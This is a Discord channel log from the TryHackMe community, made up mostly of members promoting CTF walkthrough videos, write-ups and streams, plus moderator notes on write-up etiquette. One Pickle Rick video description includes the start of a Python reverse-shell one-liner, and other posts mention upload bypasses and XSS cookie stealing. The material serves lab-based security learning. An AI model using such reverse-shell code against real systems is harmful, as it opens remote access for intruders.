#thm-community-media
1 messages ยท Page 37 of 1
TryHackMe sticker swags, when
already exists in the merch shop :)
Walkthrough and explanation for the SoMeSINT room on THM.
TryHackMe room walkthroughs playslist: https://youtube.com/playlist?list=PLOOUH_Gz8V1jLEINkbZtsdPqkzw9oFeNt
@graceful coral
Ey Latin America, today KOTH in stream at 930 pm gmt-5, CTF with consoles:
https://www.twitch.tv/hackorgame
Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
TryHackMe Official Discord: https://discord.gg/tryhackme
TryHackMe Official Subreddit: https://reddit.com/r/tryhackme
TryHackMe Room: https://tryhackme.com/room/rptmux
IppSec's Awesome Tmux Video: https://youtu.be/Lqehvpe_djs
Let me underline that it's important to pay close attention to details. There's a hidden thm code inside currently unclaimed
is that the first time chev face reveal? ๐
perhaps, i have linked too ya know
ghostping?
If anyone wants to join the show we are doing VulnNet now at https://twitch.tv/sup3rhero1
Hi and welcome to my stream! I am Sebastian aka sup3rhero1 streaming educational content about ethical hacking, technology and hardware stuff. Let's have an awesome time together!
Back again after dinner break - join me for h4cked ๐ link above
@willow patrol Hi, this channel is for Streams, videos, blog posts, etc of TryHackMe content so I've deleted your message.
In this video for our series Pop Pop Pop Another Server Drop, we are popping the Mr Robot vulnerable machine. Things learned in this lesson include:
- Nmap for port scanning and arp scanning
- Gobuster for directory busting
- Wordpress hacking
- Password cracking with john the ripper and WPScan
- PHP reverse shells
- Hashes
- Netcat for reverse shells
- TTY and how to use python to get a more stable shell
- Basic BASH commands
- SUID bit
- Nmap interactive mode privilege escalation
So letโs get popping!
In this video for our series Pop Pop Pop Another Server Drop, we are popping the Mr Robot vulnerable machine. You can find the Virtual Box file here: https://www.vulnhub.com/entry/mr-robot-1,151/ Things learned in this lesson include:
- Nmap for port scanning and arp scanning
- Gobuster for directory busting
- Wordpress hacking
- Password cr...
Hacking some Windows on TryHackMe over at https://twitch.tv/sup3rhero1
Hi and welcome to my stream! I am Sebastian aka sup3rhero1 streaming educational content about ethical hacking, technology and hardware stuff. Let's have an awesome time together!
Hi people, hi latin american people, today we have KOTH 930 GMT-5:
https://www.twitch.tv/hackorgame
Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.
Walkthrough and explanation for the Glitch room on THM.
Posting a bit late but hope it still helps some of you
Complete Walkthrough and explanation of THMs Wreath Network.
Please don't mind me being silly in the last few minutes, i had been recording for the past +10 hours (thanks to Kazam eating my 2 hour long screencasts and the 1 million bloopers) so i couldn't think straight!
Hope you enjoy the video :D
Hopefully this helps someone
A short walkthrough of a buffer overflow and the process to get a shell every time in preparation for OSCP.
Socials
Twitter: @Alomancy
Twitch: http://twitch.tv/Alomancy
Youtube: https://www.youtube.com/c/AlomancyIRL
Discord: htt...
Socials Twitter: @Alomancy Twitch: http://twitch.tv/Alomancy Youtube: https://www.youtube.com/c/AlomancyIRL Discord: https://discord.gg/jn4VXgtVeF Practice If you would like to practice Buffer Overflo...
guide to go with it ๐
https://mrzeeqa.gitbook.io/mrzeeqa/thm for fellow dutchmen
Walkthrough and explanation for the Ustoun room on THM, we compromise the box in 2 different ways:
- With Metasploit and PowwerUp.
- Without Metasploit and PowerUp.
Please watch the first 4:20 minutes of the video and then skip to 13:00 if you want to watch the manual exploitation.
Video walk-through of the popular Capture the Flag (CTF) box on the popular website TryHackMe.com
Room Link:
https://tryhackme.com/room/picklerick
LINKS:
Facebook: GeardoRanger
Twitter: @Geardo_Ranger
Discord: Geardo_Ranger
Telegram: Geardo_Ranger
https://www.GeardoRanger.comโ
Hi and welcome to the Stream. I'm an Engineer currently learning the basics of InfoSec from https://tryhackme.com/ or other sources. I might also be streaming some games or producing music sometimes. If you haven't already followed me feel free to do so anytime to support this channel. Thank you!
We are live now! making cyber security defence path ~ Windows Logs
Video walk-through of the AllSignsPoint2Pwnage Capture the Flag (CTF) box on the popular website TryHackMe.com
Room Link:
https://tryhackme.com/room/allsignspoint2pwnage
LINKS:
Facebook: GeardoRanger
Twitter: @Geardo_Ranger
Discord: Geardo_Ranger
Telegram: Geardo_Ranger
https://www.GeardoRanger.comโ
StegSeek:
https://github.com/RickdeJager/s...
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Task Timestamps:
0:00:00 - Video Overview
0:00:13 - Task 1: How websites work
0:02:34 - Task 2: HTML
0:09:02 - Task 3: JavaScript
0:13:22 - Task 4: Sensitive Data Exposure
0:16:06 - Task 5: HTML Injection
TryHackMe Official Disco...
Ey today in my channel we have KOTH, ey people from latin america!, if someone wants to particpate, let me to know!;
https://www.twitch.tv/hackorgame
Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.
Hey @dry kestrel !
This channel is for TryHackMe only content ๐
You can post direct links to write-ups but this isn't the channel to promote your blog :<
If you would like, you can post it in #general -- just as long as you don't excessively promote it :))
Ah, it's fine, i asked in general and was told i can post here lol.
Sorry for inconvenience :sweat_smile:
No problem :))
Stream will start at 6pm EST (in about 50 minutes). We'll be doing the new Tribute room over on @RealTryHackMe.
Come join us! https://t.co/jbTYrOj3io
Is there a way i could DM OSINTDojo, creator of Sakura Room?
He's not in this Discord it seems
so it would seem 
Could probably try their Twitter?
ya doing that
site dm
It was regarding the badge system.
I use my personal account on Discord ๐
This looks fun https://www.reddit.com/r/tryhackme/comments/mydj02/professional_red_teamer_taking_on_viewers_in/
Hey I am live hacking on TryHackMe over at https://twitch.tv/sup3rhero1
Hi and welcome to my stream! I am Sebastian aka sup3rhero1 streaming educational content about ethical hacking, technology and hardware stuff. Let's have an awesome time together!
@dark condor As that is not tryhackme community media, I have deleted your message.
Just about to start hacking on TryHackMe over at https://twitch.tv/sup3rhero1
Hi and welcome to my stream! I am Sebastian aka sup3rhero1 streaming educational content about ethical hacking, technology and hardware stuff. Let's have an awesome time together!
Follow me on Twitter: https://twitter.com/darkstar7471Join my community discord server: https://discord.gg/NS9UShnTryHackMe Official Discord: https://discord...
@here hi guys today we have KOTH, latin americans are invited, if someone wants to play with us, you are welcome:
https://www.twitch.tv/hackorgame
Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.
https://www.youtube.com/watch?v=g2CnIgjHeX8
8 minutes until itโs live!
Be sure to jump into the TryHackMe Discord! https://discord.gg/tryhackme
Hang with our community on Discord! https://johnhammond.org/discord
If you would like to support me, please like, comment & subscribe, and check me out on Patreon: https://patreon.com/johnhammond010
E-mail: johnhammond010@gmail.com
PayPal: http://paypal.me/johnhammond010
Gi...
where is the result of the OSCP draw?
They're currently removing cheaters
๐
We are about to play some KOTH over at https://twitch.tv/sup3rhero1 Come and join us!
Hi and welcome to my stream! I am Sebastian aka sup3rhero1 streaming educational content about ethical hacking, technology and hardware stuff. Let's have an awesome time together!
Streaming some THM Hacking over at https://twitch.tv/sup3rhero1 Come and join us!
Hi and welcome to my stream! I am Sebastian aka sup3rhero1 streaming educational content about ethical hacking, technology and hardware stuff. Let's have an awesome time together!
Video walk-through of the BrainStorm Capture the Flag (CTF) box on the popular website TryHackMe.com
Follow me on Twitter for updates on upcoming videos @Geardo_Ranger
Room Link:
https://tryhackme.com/room/m4tr1xexitdenied
LINKS:
Facebook: GeardoRanger
Twitter: @Geardo_Ranger
Discord: Geardo_Ranger
Telegram: Geardo_Ranger
https://www.GeardoR...
Hi Everyone, today it a KOTH day by streaming, eveyone is welcome!
https://www.twitch.tv/hackorgame
Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.
This room was released way before this exploit. Would be beneficial for you, and anyone reading, to also know the intended route. Itโs good you highlight a kernel exploit that will work, but the intended route can teach people more.
OverlayFS will work on honestly the majority of THM rooms, because it's so new
RootMe write up : https://www.notion.so/RootMe-a79e204f8e0643758b05132e7ff0ab08
@graceful coral nice 1
๐ "Hack your way in. Get the Flags. Don't get stung."
๐ Me and ~1800 more hackers was trying to root the box for the chance to get the OSCP voucher and five One Month TryHackMe Subscription Vouchers. With this one I've learned so much that without this write-up everything I've learned would be lost forever. Hereby behold, my 7 days of struggle!
๐ฅ Read my #writeup of "Year of the Jellyfish" hosted by Try Hack Me.
https://ethicalme.hashnode.dev/thm-yotjf
@flat plinth
Few things not quite correct there:
- The throttling with the public IP is your ISP -- not the box
- I didn't change the filter after the event:
*.phtmlby itself would never have worked.*.gif.phtmlstill will
Also, please submit to the room for review before sharing publicly ๐
ahh didn't know we have to get through some review process before publishing
thanks for telling me that
Nah, just courtesy to let the room creator have a look first
Ah, ok. I just think about it how I approach the challenge and to share with others what my thoughts were during the solving process. Like, I'm not doing the official review or something - it is more like my process and thoughts. But from the other hand I can get a immediate feedback on where my logic went wrong - so that's nice.
Thank you for indicating where I can correct the article
Some THM Wreath over here: https://www.twitch.tv/hey_its_lgg
Hi and welcome to the Stream. I'm an Engineer (from Djibouti) currently learning the basics of InfoSec from THM / HTB or other sources. I might also be streaming some games or producing music sometimes. If you haven't already followed me feel free to do so to support this channel. Thank you!
Tooling then THM https://twitch.tv/ahaquer
i liked it, great write up ๐
Hi boyz/girlz today we have KOTH in channel, everybody is invited:
https://www.twitch.tv/hackorgame
I see we had the same idea this week ๐
๐ "Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!"
๐ก Practical example of reverse shell usage and sudoer understanding.
๐ฅ Read my "Pickle Rick" write-up
๐ https://ethicalme.hashnode.dev/writeup-get-schwifty-pickle-rick
I read about it nice one man btw i try to use python payload didnt work 
the port you are connecting to from the target machine could be a problem - I've got that issue on YotJF if I remember correctly
also depends what kind of problem you had
@flat plinth Python Payload didn't execute i finally use perl payload to done the shit. I use python payload not a python3 i think that might be the problem
well, maybe
a newbie makes his first hacking blog post: https://hermannc.dev/2021/05/30/tryhackme-overpass-2-hacked/
Is there a reason you haven't submitted this to the room?
Kinda wanted to see what people thought of it, and because I didn't know that was a thing to do ๐
I'd also appreciate it if you could remove the answers/any passwords
Sure, i left out the actual 'main' answer
Is the picture with the information included, but not called out acceptable? (like for question 2?)
I'd rather it wasn't there, like especially the password
oh yea, i'd definitely obfuscate passwords
this particular one didn't have any actual passwords
I made the room
Just this image here, I'd appreciate it if you blocked out the password just below. That sort of thing.
ooooohh, that password, sorry, i was thinking flag, sorry!
As for this bit, John is fussy. It needs --wordlist=/path
also be careful with i vs I, it's always I when you're saying like I did this
Ah true, my crappy lazy habits ๐
Also, I JUST realized this was only part one ๐คฃ
do you consider
So, right off the top, we see an HTTP GET request to /development/, and then a POST to /development/upload.php, which my gut instinct tells me would be the URL, but, as THM helpfully shows us, it's looking for a single world between slashes.
to be too close to an answer?
A little, but eh. Also, typo - world/word
๐คฆโโ๏ธ
What I will probably do is complete the rest of the parts that i completely missed, and submit as one big post for the room
good one @graceful coral
good1 @graceful coral
Reversing ELF TryHackMe | Reverse Engineering | techy krish https://youtu.be/0RF-id8vUk0
DISCALMER
This video is only for educational purposes!
In this video we will learn about...
reverse engineering
back engineering
backwards engineering
tryhackme ctf
reversing elf
radare2
r2
malware analysis
extract info out of binary
reversing challenges
reversing ctf
crackme1
crackme2
crackme3
crackme4
crackme5
crackme6
crackme7
cra...

Great box !! Such a madness
https://defaltlibary.blogspot.com/2021/06/madness-tryhackme.html
@orchid estuary Hey that isn't TryHackMe related ๐
great box from optional
https://defaltlibary.blogspot.com/2021/06/cmess-tryhackme.html
Complete walkthrough of c4ptur3-th3-fl4g room:
https://youtu.be/mdpnBG6TRW8
This is the complete Walkthrough of TryHackMe room c4ptur3-th3-fl4g.
00:00 - Intro
Task 1 - Translation and Shifting
[00:32] - flag1
[01:51] - flag2 (binary)
[02:14] - flag3 (base32)
[02:32] - flag4 (base64)
[02:49] - flag5 (hexadecimal)
[03:17] - flag6 (rot13)
[03:29] - flag7 (rot47)
[03:51] - flag8 (morse code)
[04:10] - flag9 (bcd)
[05:47]...
RootMe Walkthrough
https://www.youtube.com/watch?v=SQflsrtS21A&t=6s
In this video, I will be showing you guys the walkthrough of a TryHackMe machine called "RootMe".
If you liked the video make sure to Like, Share, and Subscribe for more quality content.
The next video will be about the Pickle Rick machine on TryHackMe, so stay tuned.
Pickle Rick Walkthrough
https://www.youtube.com/watch?v=EaiIqKqGnpI
In this video, I will be showing you guys the walkthrough of a TryHackMe machine called "Pickle Rick".
If you enjoyed the video make sure to Like, Share, and Subscribe for more quality content.
@gloomy ruin u dont need to download the vpn file everytime
only once (non sub)
is fine as well
what is no sub?
subscription
yes, no sub
I will get it once I am done with my grade 10
just gotta concentrate on study now
weeww 10th grade
Yup
Same mate
nice
Ok from pins ๐ I see that flags are not allowed to be shown . I have some doubts
1)for old rooms do I need to wait for the permission of the author of the room to publish the write-up ?
2) I see write-ups showing the flags for old rooms not the new ones is it ok with that? Coz it may need some lil bit more editing
@spice kayak Please do not include flags or passwords (also SSH keys probably count there) in your writeups.
You don't need permission from the creator but it's nice to. That's what submitting it to the room is for, in part.
You can wc them, or maybe md5sum them
yeah i also though if the same thing wc
ุงูุณูุงู ุนูููู
ูุงุฑุจ ุชููู โุงุณุชูุฏุช ู ู ุงูู ูุทุน ูุฅุฐุง ุงุณุชูุฏุช ุงูุดุฑ ุงูู ุงุฎููุงู ุนุดุงู ูุณุชููุฏ ู ููโค
ุงุฐูุฑ ุงููู โค
ุญุณุงุจู ุงูุณุชุง: https://www.instagram.com/sirsaddamreal
ุงูุณูุฑูุฑ ุญูู ูู ุงูุฏุณููุฑุฏ :https://discord.gg/vrrbpqARFk
Disclaimer - video is for educational purpose only. Copyright Disclaimer Under Section 107 of Copyright Act 1976, allowance is made f...
How can I get the Act of Kindness badge? I thought I need to solve both of the wonderland room and I'll get it. I had to realize I've dove with them.
Is it a bug or I have to solve another room?
Act of kindness is a community badge
Being nice, purchasing vouchers for users, giveaways etc.
oh
Usually youโre commended by a moderator to Skidy
That'd be act of Malice or something, those rooms are just mean
couch tryhackme writeup
https://youtu.be/llMS_0ciFks can i have some traffic towards my channel brothers ๐
Pickle Rick Walkthrough, with normal web interface and with Python Reverse Shell.
Python Reverse shell:
Just change IP to your tun0 IP and Port to whatever port you want to listen the incoming connection on.
====================================================================
python -c 'import socket,subprocess,os;s=socket.socket(socket....
I did my second write up,
https://ekimik.medium.com/tryhackme-boiler-ctf-c498ae3040b8
Check it out and let me know for feedbacks!
Lol here's my one: https://cybxrlxnd.blogspot.com/2021/07/looking-to-get-into-cyber-security-this.html
oh crap I missed an "or"
It's not as "proffesshanoal" as mine.
Your one is incredible, a true work of art
Yeah
Much info, many detail
Can't wait till I get my 10 tickets
Here's mine!
https://blog.cyberethical.me/review-pre-security
Edit: that compression
le blog post https://blog.hydrashead.net/posts/cybersec-with-tryhackme/ ๐
Beginning your cybersecurity adventure? Look no further than TryHackMe!
https://medium.com/p/a089d746df2c Here is my blog post.
can i use tryhackme content (images and animated videos) for creating content on youtube ?
https://htmlhacker.medium.com/how-to-get-started-really-started-in-hacking-41d3b8d3d5d3
My post now in English
looks great, thanks!
Gave +1 Rep to @real zodiac
thank you ๐
Gave +1 Rep to @thin oak
Opa, eu sou o Black, atualmente entre os top 60 hackers brasileiros da TryHackMe, e estou trazendo mais um video sobre Hacking/CTF para o canal!
#hacking
Room: Bounty Hacker - Tryhackme
Link: https://tryhackme.com/room/cowboyhacker
Github: https://github.com/BlackReaperSK
TryHackMe: https://tryhackme.com/p/BlackReaper
Meu discord: BlackReaper...
Hi all, this is my first Medium post for a TryHackMe room, Fowsniff CTF, would really appreciate any feedback:
https://thef1ash.medium.com/tryhackme-fowsniff-ctf-107ca257ca1c
Looks great
https://www.twitch.tv/westar WESTAR IS STREAMING
Guess it's worth dropping here:
VulnNet: Roasted - Raw take (for the most part)
A great Windows box that utilises a bunch of AD wizardry
https://www.youtube.com/watch?v=5Db2ywExEGc
Join me as I hack my way to the top of the TryHackMe leaderboard. The goal of this series is to climb to AT LEAST the top 50 on the leaderboard through any means possible!
This series is being streamed over on my Twitch Channel so go and drop a follow if you want to see more!
Not all boxes will be uploaded but we will get as many as we can o...
ok i have a doubt can i write blogs / make viedos on subscriber only rooms ?? and networks ?? like throwback and holo
Yes
ok thanks
Gave +1 Rep to @tropic lava
Hello everyone, I am Anirudh and in this video, I will be showing you guys the CC: Pentesting room walkthrough.
I just started streaming! Check it out: https://www.twitch.tv/sup3rhero1 Let's look at some fresh rooms!
Hi and welcome to my stream! I am Sebastian aka sup3rhero1 streaming educational content about ethical hacking, technology and hardware stuff. Let's have an awesome time together!
THM wallpaper pack when? ๐ .
Ask CMN ;)
๐y e s
Writeup for SweetTooth
https://manash01.medium.com/tryhackme-sweettooth-inc-non-port-forward-method-a658d587c481
Thank you
I have submitted it on the room's page but can't see it there. Should I contact the room's creators for this? Sorry, this is my first time posting ๐
Writeup for CMSpit
https://cyberjunnkie.medium.com/cmspit-ctf-tryhackme-d21b9b51291f
Hey yeah, usually it is for the room creator to accept. Although, I'll take a look at the writeup and accept it if it is unique to other writeups (if there are other writeups) you should get an email from THM if I accept or reject it ๐
ooh there is like 8 pending, lemme sort through them real quick in order of when they submitted
Cool thanks โค๏ธ
Back doing some THM on stream in 10min https://twitch.tv/sup3rhero1
Hi and welcome to my stream! I am Sebastian aka sup3rhero1 streaming educational content about ethical hacking, technology and hardware stuff. Let's have an awesome time together!
I accepted it a while ago (basically just as I sent that message above) (:
๐ฅณ just saw that mail :) thanks
npnp!(:
Pain, suffering and memes in this VulnNet: Internal Raw Edit!
https://youtu.be/SuRMLj7YeuM
Join me as I hack my way to the top of the TryHackMe leaderboard. The goal of this series is to climb to AT LEAST the top 50 on the leaderboard through any means possible!
This series is being streamed over on my Twitch Channel so go and drop a follow if you want to see more!
Not all boxes will be uploaded but we will get as many as we can o...
This is the followup of the first part of the room CC:Pentesting
Hello everyone, I am Anirudh and in this video, I will be showing you guys the CC: Pentesting room walkthrough.
Twitter: https://twitter.com/VainXploits
Instagram: https://www.instagram.com/anirudh_dilli/
If anyone is streaming some rooms tonight (UK time) please ping me, would be interested to see more experienced folks than me working through things.
Continuing Wreath as if it were an actual pentest! Come ask questions and join the fun https://twitch.tv/optionalCTF
Come and join some free training using TryHackMe resources! https://twitch.tv/sup3rhero1
Write-up for final challenge in the Upload Vulnerabilities room.
Bypassing the simple upload form to get RCE on a server.
It would be polite to get that accepted on the room before advertising it ๐
Especially given I see at least one inaccuracy off the bat
Nginx is the load balancer / reverse proxy. Express is the backend.
thanks Muiri for correction, I really appreciate it
but, once again I don't feel like posting the writeup in the room because it is just my interpretation of the solution - are you guys chasing other people posting their writeups of rooms? when you google the "thm uploadvulns" phrase you can see that there are many writeups already, but not a single one in the room writeups - it is just a training one, nothing advances, so you can see the community don't stress much about providing the writeups at the official channel ๐
Gave +1 Rep to @formal sparrow
I don't find it being rude, to share the THM content and by doing so, giving appreciation to the platform by providing articles about it - I don't see a need to be it accepted on the THM first
No, we're not chasing people for it -- you're getting asked because you're using the official Discord server to advertise your solution, rather than just posting it ๐
As a general rule it is polite to ask the room creator to approve it before going out of your way to advertise it. As you say, it's your own solution, so it's a case of making sure that the creator is happy with endorsing it as a solution on the room.
That's more the case for challenges than for walkthroughs, obviously -- Jewel just treads the line between them.
from that point of view.. that makes sense - but.. are really all content posted here is accepted beforehand?
and well if I make some mistakes - community can always contact me/write a comment, that's how it suppose to work, right? that way both sides can learn
first YOTJF, then Jewel - I must learn that finally ๐
Mhm -- we try not to allow anything in here that isn't accepted on the room first
ok I understaind, but is it somewhere written down for new users?
Wonderland Road to Top 50 Raw Edit
https://youtu.be/V19y1Sz3vmg
Let's hack wonderland, this amazing box demonstrates the exploitation of library imports in the Python programming language, PATH manipulation and finally abusing Linux capabilities on the Perl binary to gain root!
Join me as I hack my way to the top of the TryHackMe leaderboard. The goal of this series is to climb to AT LEAST the top 50 on th...
Streaming some easy beginner friendly THM room over at https://twitch.tv/sup3rhero1
This blog is written as I was going over a material that takes advantage of Chisel. A very flexible and easy-to-use port forwarding & proxy forwarding utility. During this blog. I figure it would be nice to show how I come up with the theory and put it into practice. The general concepts are the same as you will find in any other blogs that are ...
Question, regarding writing a blog post, I'm about to start /room/relevant, but it says writeups own't be accepted, but if i did as it suggests and write an actual report and post that to a blog? More of an ethics question than anything else.
well, ethically, if a creator asked you not to do that and you do it, its probably mildly unethical.
if it was unlisted/private write up I doubt it would be unethical but I assume other people have access to your blog
ok, thanks. I wasn't sure if the penetration report would still classify as a "writeup" since, from my brief research it's more of a conclusion/recommendations document, more than a how to (which if it would include, i wouldn't)
well a pen-test report needs an attack narrative which is 'what you did to gain access', basically the meat and potatoes of a writeup
I imagine that room creator has those requests because they would like their own guides to be the ones referred to, if you are doing something like that for potential employers to look at later I don't think it'd be too bad really
Gave +1 Rep to @stone marsh
For your own blog, go ahead :)
Please keep flags/passwords out as a common courtesy, but blog post reports are good for rรฉsumรฉs ๐
Just bear in mind that it won't be accepted to the room, and we won't advertise it in here (I.e. please don't post links to it in the Discord/subreddit). In terms of writing it though? Go for it. It's not like there isn't already an official walkthrough for it ๐คทโโ๏ธ
It might take me a year and a half to get through it though. first thing that's "freeform"
Preface I see so many people who are interested in getting involved in infosec whether it be that they want a career change or an exciting new hobby and one question they ask the most is โHow do I get started?โ Naturally there are hundreds of different answers, but I figured I would weigh in my own opinion, so here it is in three simple tips.
Haha, trying to squeeze it into the conversation, I see you
@urban crescent how does it look on an ultra-wide? ๐
I see how that might be a problem 
Same ๐
even smaller on mine
Loving the content though
Displaying fine on mobile 
Well written and accurate though, will recommend to anyone who wants to join infosec
It looks like morse code if I try to zoom in 

Beep Beep dash dash mofo
Display is fine on 24" 1080p monitor aswell 
am trying to do wreath with as less help from the walkthrough in the room: https://www.twitch.tv/mrzeeqa, feel free to give me some feedback if you all don't mind
You won't have much difficulty -- Wreath is a sandbox. It's not designed to be difficult. The only purpose for those machines is to follow along with the teaching material in the room -- otherwise it would take about 10 minutes to do, if that.
Trying to do it blind is entirely missing the point ๐
I didn't mention but i already did the network once while being guided, now i wanna try and see if i could do it without guideness
But i understand your point though. Wreath is actually a well explained walkthrough. So i'm challenging myself to see whether or not i understood what was being explained
Ah, gotcha ๐
You did a great job i believe, already on the gitstack and haven't peaked at my answers. Your way of explaining can be longdreaded sometimes, but it's all coherent so it sticks for the most part
I remember wreath explained pivoting at one point, which made me come to the conclusion it's not necessary to upload a nmap binary on prod-serv, but rather i can use sshuttle to route the traffic via ssh specifying the id_rsa with --ssh-command
https://twitch.tv/mrzeeqa doing some ctfs
@tropic lava
Hi, where can I ask questions about the progress of my thm room and other stuff about room creation?
#creators-lounge @cloud wagon
You can ask one of the mods to give you role
nvrmnd
Ty
Gave +1 Rep to @formal sparrow
https://www.twitch.tv/0xtib3rius
THM KOTH live rn^^
i was about to post it...
๐
wopah ๐ฅบ
Anyone know how can I share my profile on LinkedIn?
Oh thatโs it lol. I thought I can share it directly from THM.๐
@tropic lava
Done
Thanks:D
How can I upload gif image as profile pic in Try Hack Me ?
you can't anymore
Empline Writeup : https://mikadmin.fr/blog/tryhackme-empline/
@graceful coral Please try to keep it to just THM content here
Ah ok, will do.
Hey guys Im trying a new method of self-study and streaming some THM study alongside of my OSCP prep. Feel free to drop in and chat, I want to get more engaged with the community! https://www.twitch.tv/gonski47?tt_medium=link_copied
Salve galera beleza, matheuz security aqui e nesse vรญdeo resolvi uma maquina do KoTH ( King Of The Hill) do tryhackme!
==== Sobre o Video ====
site: https://tryhackme.com
meu perfil: http://ttyhackme.com/p/MatheuZSec
รรรร Redes Sociais รรรร
Discord: MatheuZ Security#9509โ
Twitter: @MatheuzSecurity
@queen jackal This channel is for Streams, videos, blog posts, etc of TryHackMe content
oh I'm sorry
is there any room where I could share that video about note taking for the CySA+ ?
#resources I guess
Hey so I made this for people that want their tryhackme badge on their github profile README for some reason if I just linked it with the aws link it wouldn't work so here is a github action that just downloads the image and uploads it on a repo you own to be linked in the README https://github.com/p4p1/tryhackme-badge-workflow
I don't really know where to posts this so ping me if it's not the correct channel
Ironically, the issue that stops you from just embedding it directly has just been fixed
Hahaha no way ๐
I just checked for me it hasn't been fixed for some reason well at least it exists for people that are interested ๐
Just uploaded a new video about XSS, check it out
https://youtu.be/o9gkGV25B9A
Thanks For watching
Don't forget to leave a like and Subscribe.
โบ Follow me!
โขTwitch: https://www.twitch.tv/jupiter3047
โขInstagram: https://www.instagram.com/bs02p/
โขTwitter: https://twitter.com/Jupiter3301/
โข PowerPoint file: https://drive.google.com/file/d/1Anos...
-----------...
Hey everyone! ๐
Just in case there's anyone here going through the latest TryHackMe Learning Path!
I just did a walkthrough for the first Room ๐ฅณ
Hope you enjoy it! ๐ ๐
Hey everyone!
This video is a walkthrough of the TryHackMe's Penetration Testing Fundamentals Room!
Summary:
0:00 - Intro
1:33 - Task 1
2:36 - Task 2
8:42 - Task 3
14:10 - Task 4
17:17 - Task 5
24:02 - Conclusion
Links to all Study Resources:
Sibex Study Guide and Practice Tests - https://bit.ly/3cWQfyh
Jason Dion's Complete Course - https:/...
awesome @queen jackal but a good consideration if you want to do youtube videos, is to consider whether images like that (the images/components in the thumbnail) are actually yours/you have the rights to use (:
you are absolutely right @formal iron ! I might have take that for granted, I'm sorry!
Do you know who I can contact from TryHackMe to ask for permission for future walkthroughs?
Thank you so much for your kind advice ๐
Gave +1 Rep to @formal iron
@stable heron this channel is for directly THM related content
@formal iron just sent you a message on twitter, asking for permission to do a walkthrough of your Room ๐
Thank you!
You could walk through other content
Thank you for responding on Twitter Ben! @formal iron !
I really appreciate it ๐ฅณ
Gave +1 Rep to @formal iron
No thank you (:
Gave +1 Rep to @queen jackal
You missing a comma there, bud? ๐
Letโs eat, grandpa. vs Letโs eat grandpa.
Ahah xD
Commas are evil
When I am on mobile
English standards and rules do not apply ๐
If you can depjyjer it then god speed
Here's the walkthrough of the second room from the newest learning path, Jr Penetration Tester ๐
Hope you enjoy it!
This video is a walkthrough of the TryHackMe's Principles of Security Room! ๐ฑโ๐ป
Here's the link to the room: https://tryhackme.co/room/principlesofsecurity
Also, make sure you follow Ben, he's the creator of this room!
All credit goes to him ๐
Twitter: https://twitter.com/CMNatic
TryHackMe: https://tryhackme.com/p/cmnatic
Summary:
0:00 - Int...
@stable heron this channel is for THM related content
writeup #3 I'm having an awesome time https://deltreey.blogspot.com/2021/10/tryhackme-bounty-hacker-room.html
https://deltreey.blogspot.com/2021/11/tryhackme-lazyadmin-room.html another ctf writeup
Anyone up for a new challenge! There is a competition happening right now! https://www.linkedin.com/posts/jackpalmercybersecurity_competition-prize-2-month-subscription-activity-6864289185528991744-1ngl
Salve galera beleza, matheuz security aqui e nesse vรญdeo iremos rootar a maquina carnage do KoTH do tryhackme!
==== Sobre o Video ====
site: https://tryhackme.com
site do koth: https://tryhackme.com/games/koth
meu perfil: https://tryhackme.com/p/MatheuZSec
รรรร Redes Sociais รรรร
Discord: MatheuZ Security#9509โ
Twitter: @Mathe...
sigam tambรฉm o caminho do meu amigo matheus
Fala galera!!! espero que tenham curtido minha pequena aula!
se gostarem curtam comentem e compartilhem
+++++++++minhas redes sociais++++++++
-Instagram
https://www.instagram.com/rzxthm/
Finding and Fixing DOM-based XSS with Static Analysis
https://blog.mozilla.org/attack-and-defense/2021/11/03/finding-and-fixing-dom-based-xss-with-static-analysis/
@spiral heart Is this tryhackme related?
xpost from #general but hello good morning
I will play some ETS2
And then
stream in vc
I need to look into/fix the Yara room
Since people seemed to enjoy last nights
TryHackMe - Road
Challenge site: tryhackme
Difficulty Level: Medium
Room: Road
#tryhackme #writeup #ctf
sharing third time? ๐ค
@lime cosmos Please stop reposting the same video, it's turning into advertising.
ok ๐
Hey I have uploaded the walkthrough of today's Day 5 challenge by two methods - one is the intended path and another by stealing cookie from target. 2nd method is at Timestamp 3:50.
https://www.youtube.com/watch?v=Y8Ny5y2FXcA
#XSS #Cookie #Adventofcyber3 #2021 #webapp
This video contains walkthrough of Day 4's task from Advent of Cyber 2021. We will solve by two methods one intended method of tryhackme and another with cookie stealing and both will involve Cross-Site Scripting(XSS) - another web vulnerability. More will follow this videos as new tasks are released da...
nice method 2
Hey everyone! I have a question
When we make a walkthrough, do we have to blur all the answers or just the flags?
Because some of the more beginner friendly answers are written on the question itself, or even on text above the question, so its almost impossible not to "read" the answers, before we even start the practical hacking part. So it's hard to bleep/blur everythin
What should we do?
Well, then you could write something like..."And here you should read the text :)" and only focus on describing the steps for the parts that involve something hands-on
That's actually one way to do it! Thank you @graceful coral
Gave +1 Rep to @umbral charm
If it's an article, it's a bit easier. The main goal is to avoid answer dumps or people just copy/pasting answers
Got it! Maybe I should just focus more on the rooms that only have the practical approach and blur the flags in the end (?)
So that people can learn the methodology but have to put it the work to get the answers
Hey this is my walkthrough on day7 of Advent of cyber
https://youtu.be/xlXDHqENMUo
#NoSQL #Injection #Adventofcyber3 #2021 #webapp
